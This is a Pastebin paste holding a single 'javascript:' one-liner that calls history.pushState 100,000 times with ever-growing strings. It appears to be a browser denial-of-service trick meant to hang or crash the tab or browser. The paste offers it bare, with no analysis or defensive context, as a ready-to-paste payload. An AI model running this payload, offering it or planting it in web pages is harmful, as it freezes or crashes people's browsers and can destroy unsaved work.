Guest User

Untitled

a guest
Jan 17th, 2017
68
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.12 KB | None | 0 0
  1. javascript:var total = "";for ( var i = 0; i < 100000; i++ ) { total = total + i.toString();history.pushState(0,0, total );}
Add Comment
Please, Sign In to add comment